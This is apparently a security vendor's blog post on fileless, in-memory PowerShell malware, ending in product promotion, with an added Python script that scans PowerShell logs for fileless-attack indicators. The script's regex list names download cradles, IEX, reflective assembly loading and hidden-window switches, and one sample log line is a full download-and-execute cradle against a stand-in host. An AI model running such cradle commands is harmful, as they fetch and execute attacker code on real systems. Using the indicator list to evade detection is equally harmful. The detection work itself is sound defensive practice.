Fileless, Malwareless, In-Memory Malware… regardless of what trendy names these attacks are given by the press, they all share the same attack characteristics. Generally speaking, these attacks do not write files to disk, but rather, they exist and operate solely within system memory. They often utilize common admin tools such as PowerShell that are widely available yet rarely controlled on most enterprise systems. As a result, these attacks are often called ‘living off the land’ attacks as well.
Today’s Threat Spotlight blog by the Cylance Threat Guidance team highlights the technical details of two such malware families. Our endpoint protection product CylancePROTECT® uses artificial intelligence and machine learning to easily thwart these types of attacks in your enterprise.
Fileless malware is relatively sophisticated to build and deploy, and as a result it is still relatively rare to encounter in the wild, but it poses a very real threat. It differentiates itself from most other malware by not leaving files on disk – hence its name. Instead, it uses a variety of tricks to stay resident in memory and execute commands that already exist on the machine.
Often it uses a tool like PowerShell to coordinate the attack, together with a Meterpreter payload whose in-memory DLL injection stagers set up additional attacks. Because nothing is written to disk, it poses a unique challenge to traditional security products that rely on inspecting files on disk in order to match a detection to a signature.
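Because the file-inspection approach described above has nothing to inspect, defenders usually fall back on the one artifact a PowerShell-driven fileless attack cannot avoid leaving: the command line or script block that was executed (PowerShell script block logging, Event ID 4104, records the latter). The following is an added example, not Cylance's code or part of the original post, showing a small triage routine over constructed log lines. The indicator names, patterns and the flagging threshold are this example's own choices; the base64 sample is built inline so that the `-EncodedCommand` decoding path (PowerShell encodes the script as UTF-16LE) can be exercised offline.

```python
"""Triage PowerShell command-line / script-block text for in-memory execution indicators.

Added example (not Cylance's code). All log lines below are constructed samples.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

# Patterns commonly associated with fileless / living-off-the-land PowerShell use.
# The names and the patterns are this example's own, not a vendor rule set.
INDICATORS: Dict[str, re.Pattern] = {
    # -e / -ec / -enc / -EncodedCommand followed by a base64 blob (captured for decoding)
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    # download cradles that pull a second stage straight into memory
    "download_cradle": re.compile(
        r"DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    # evaluation of a string as code
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    # loading a .NET assembly from bytes rather than from a file on disk
    "reflective_load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I),
    # switches that hide the window or disable profile / execution policy
    "stealth_switches": re.compile(
        r"-(?:w(?:indowstyle)?\s+hidden|nop\b|noprofile|ep\s+bypass|executionpolicy\s+bypass)", re.I),
}


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries the script as base64 of UTF-16LE text; return it or None."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def scan_line(line: str) -> Dict[str, object]:
    """Return the indicators matched by one log line, including inside a decoded payload."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(line)}
    decoded = None
    m = INDICATORS["encoded_command"].search(line)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded:
            # Re-scan the decoded script: the interesting content is hidden behind base64.
            hits |= {name for name, rx in INDICATORS.items()
                     if name != "encoded_command" and rx.search(decoded)}
    return {"indicators": sorted(hits), "decoded": decoded, "score": len(hits)}


def triage(lines: List[str], threshold: int = 2) -> List[Tuple[int, Dict[str, object]]]:
    """Return (index, result) for every line whose indicator count reaches the threshold."""
    flagged = []
    for i, line in enumerate(lines):
        result = scan_line(line)
        if result["score"] >= threshold:
            flagged.append((i, result))
    return flagged


# Constructed sample lines (not real logs). The third one is built from a small
# decoded script so that the base64 is exact without hand-computing it.
_DECODED_SAMPLE = "[System.Reflection.Assembly]::Load($bytes)"
_B64_SAMPLE = base64.b64encode(_DECODED_SAMPLE.encode("utf-16le")).decode("ascii")
SAMPLE_LOG_LINES = [
    r"Get-ChildItem -Path C:\Users\alice\Documents -Recurse | Measure-Object",
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage.ps1')\"",
    f"powershell.exe -NoProfile -EncodedCommand {_B64_SAMPLE}",
]

if __name__ == "__main__":
    for idx, result in triage(SAMPLE_LOG_LINES):
        print(f"line {idx}: score={result['score']} indicators={result['indicators']}")
        if result["decoded"]:
            print(f"    decoded payload: {result['decoded']}")
```

The benign directory listing scores zero, the download cradle scores three (cradle, `IEX`, hidden window), and the encoded line only reveals its reflective assembly load after decoding; a scanner that stops at the raw command line would see just an encoded command plus `-NoProfile`. A threshold of two is a starting point for alerting, not a tuned value; in production the same logic should run over script block logs rather than process command lines alone, since long scripts are often split across several 4104 events.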
While most fileless attacks still rely on spam or spear phishing as the initial attack vector, we know that it is simply not realistic to block all email attachments in enterprise environments. Security controls should not be so restrictive that they compromise business operations, nor should they cause employees to attempt to circumvent them in order to carry out basic job duties like reading email.
CylancePROTECT uses multiple protection elements to stop this type of threat before it causes any damage. CylancePROTECT memory defense provides protection against process injection attack techniques, and script control provides robust protection to prevent malicious scripts from being used in concert with PowerShell.
If you don't have CylancePROTECT, contact us to learn how our artificial intelligence based solution can predict and prevent unknown and emerging threats before they ever execute.